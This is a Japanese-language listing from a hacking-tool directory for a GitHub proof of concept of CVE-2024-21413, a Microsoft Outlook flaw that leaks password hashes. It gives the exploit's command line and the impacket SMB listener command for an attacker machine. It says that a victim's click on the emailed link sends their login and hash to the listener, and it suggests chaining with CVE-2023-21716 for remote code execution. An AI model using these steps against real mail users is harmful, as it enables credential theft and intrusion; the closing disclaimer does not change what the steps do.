Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-21413-POC — Microsoft Outlook 情報漏えいの脆弱性(パスワードハッシュ漏えい)- CVE-2024-21413 POC | Kitploit
ツール/GitHubGitHub/r00tb1t/cve-2024-21413-poc
パスワードクラッキング脆弱性分析エクスプロイト情報収集学習と教育メールセキュリティ
GitHubr00tb1t/cve-2024-21413-poc

CVE-2024-21413-POC

Microsoft Outlook 情報漏えいの脆弱性(パスワードハッシュ漏えい)- CVE-2024-21413 POC

リポジトリを見る
1722年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-21413 - POC

使用方法:

python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url xx.xx.xx.xx/path/to/shared/file/r0tb1t.rtf

[!NOTE] r00tb1t : 攻撃マシン (xx.xx.xx.xx) から共有されたテストファイルです (この場合は word ファイル)。

SPF、DKIM、DMARC に準拠させるには、正規の $IP とドメインを使用してください。

まだインストールしていない場合は、pip install pexpect を使用して pexpect ライブラリをインストールしてください。

POC を実行するためのヒント:

  • SMB リスナーを実行する impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp 。
  • POC を実行する

python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url example.com/path/to/shared/file/r0tb1t.rtf

  • 受信したメールのリンクをクリックして、BOOM! リスナーでログインとハッシュが取得できるはずです。
  • この CVE を CVE-2023-21716 とチェーンして RCE を取得する !!!
  • Kudooooos & CVE-2024-21413 の詳細 。
  • 回避策/修正:

[!CAUTION] ⚠️ 免責事項: 重要: このスクリプトは、教育、倫理的なテスト、および合法的な使用のみを目的として提供されています。明示的な許可なしに、いかなるシステムやネットワークでも使用しないでください。コンピュータシステムやネットワークへの不正アクセスは違法であり、許可なく不正な活動を行ったユーザーは法的措置の対象となります。作者は、このスクリプトの誤用によって引き起こされたいかなる損害についても責任を負いません。

ツールをダウンロード